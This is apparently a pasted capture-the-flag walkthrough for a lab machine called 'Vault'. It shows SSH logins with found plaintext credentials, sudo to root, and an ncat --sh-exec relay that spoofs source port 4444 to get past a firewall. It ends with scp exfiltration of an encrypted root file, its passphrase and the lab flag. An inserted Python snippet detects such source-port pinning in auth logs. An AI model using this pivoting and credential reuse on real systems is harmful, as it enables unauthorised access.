Untitled

a guest
Dec 7th, 2018
ACCESS WEBSITE FROM SERVER
ssh -D 8080 dave@10.10.10.109

==============================================================================================================
REWORK THIS AREA
==============================================================================================================
MORE CREDENTIALS FOUND
root@DNS: var www DNS desktop# cat ssh
dave
dav3gerous567

SSH INTO DNS SERVER
ssh dave@192.168.122.4
dav3gerous567

READ ALEX .BASH_HISTORY AND LOOKED AT VISUDO FILE WHICH LETS ADMINS SUDO AS ROOT

BECOME ROOT
sudo su -
dav3gerous567

TRACEROUTE (using port 1723/tcp)
HOP RTT ADDRESS
1 0.82 ms 192.168.5.1

Nmap scan report for Vault (192.168.5.2)
Host is up (0.0021s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
53/tcp closed domain
4444/tcp closed krb524
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops

TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 0.98 ms 192.168.122.5
2 1.86 ms Vault (192.168.5.2)

HOW TO +++++====================================================================================================
SEE WHAT PORTS ARE OPEN ON VAULT
cat /var/log/auth.log | grep -a 192.168.5.2
(port 4444 is used for ssh)

SET UP A LISTENER
ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444" &

ENSURE PORT IS OPEN
/usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f

SSH IN
ssh dave@localhost -p 5555

IS PORT BEING USED BY SOMEONE ELSE
ps aux | grep ncat
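
The auth.log review step above, seen from the defender's side: this added example (not part of the original paste) flags sudo-logged nmap/ncat commands that pin a fixed source port. The log lines are constructed samples in sudo's syslog format, and the function names and tool watch list are assumptions.

```python
import re

# Constructed sample lines in sudo's syslog format; not taken from the paste.
SAMPLE_LOG = """\
Sep  2 15:07:51 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f
Sep  2 15:10:20 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/ncat -l 5555 --sh-exec ncat 192.168.5.2 987 --source-port=4444
Sep  2 15:11:02 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/nmap -g 4444 192.168.5.2
Sep  2 15:12:01 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/nmap -Pn 192.168.5.2
Sep  2 15:12:40 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/apt update
Sep  2 15:13:44 DNS sshd[1021]: Accepted password for dave from 192.168.122.1 port 40112 ssh2
"""

SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.+)$")
LONG_OPT = re.compile(r"--source-port[= ](\d{1,5})\b")   # accepted by nmap and ncat
NMAP_SHORT = re.compile(r"(?:^|\s)-g\s*(\d{1,5})\b")     # nmap-only short form
TOOLS = {"nmap", "ncat"}  # assumed watch list


def find_source_port_pinning(log_text):
    """Return sudo-logged nmap/ncat commands that force a fixed source port."""
    findings = []
    for line in log_text.splitlines():
        m = SUDO_RE.search(line)
        if not m:
            continue  # not a sudo command record
        cmd = m.group("cmd")
        tool = cmd.split()[0].rsplit("/", 1)[-1]
        if tool not in TOOLS:
            continue
        ports = set(LONG_OPT.findall(cmd))
        if tool == "nmap":
            ports |= set(NMAP_SHORT.findall(cmd))
        # ncat's -p is skipped: with -l it names the listening port instead.
        if ports:
            findings.append({"user": m.group("user"), "runas": m.group("runas"),
                             "tool": tool, "source_ports": sorted(int(p) for p in ports),
                             "command": cmd})
    return findings


def ports_to_review(findings):
    """Count how often each pinned source port appears, for firewall rule review."""
    counts = {}
    for f in findings:
        for p in f["source_ports"]:
            counts[p] = counts.get(p, 0) + 1
    return counts


if __name__ == "__main__":
    for f in find_source_port_pinning(SAMPLE_LOG):
        print(f["user"], "->", f["runas"], f["tool"], f["source_ports"], f["command"])
```

A source port that recurs in the output is worth checking against the firewall rules in front of the target host, since a rule that accepts traffic on its source port alone is satisfied by any client that can choose that port.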

dave@vault:~$ ls
root.txt.gpg

SCP IT BACK TO UBUNTU MACHINE ENSURE NCAT IS WORKING
root@DNS:~# ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444" &
[1] 14627

COPY FILE FROM VAULT TO DNS USING SCP FROM DNS
root@DNS:~# scp -P 5555 dave@localhost:/home/dave/root.txt.gpg /tmp
dave@localhost's password:
root.txt.gpg 100% 629 0.6KB/s 00:00
[1]+ Done ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444"
root@DNS:~# cd /tmp
root@DNS:/tmp# ls
root.txt.gpg test.txt

COPY FILE FROM DNS TO UBUNTU FROM THE UBUNTU MACHINE
dave@ubuntu:~$ scp dave@192.168.122.4:/tmp/root.txt.gpg /dev/shm/
dave@192.168.122.4's password:
root.txt.gpg 100% 629 0.6KB/s 00:00
dave@ubuntu:~$ cd /dev/shm

DECRYPT THE GPG ROOT FILE USING THE KEY FOUND IN DAVE'S DESKTOP FOLDER
dave@ubuntu:/dev/shm$ gpg -d root.txt.gpg

You need a passphrase to unlock the secret key for
user: "david <dave@david.com>"
4096-bit RSA key, ID D1EB1F03, created 2018-07-24 (main key ID 0FDFBFE4)

gpg: encrypted with 4096-bit RSA key, ID D1EB1F03, created 2018-07-24
"david <dave@david.com>"
itscominghome

ROOT FILE
ca468370b91d1f5906e31093d9bfe819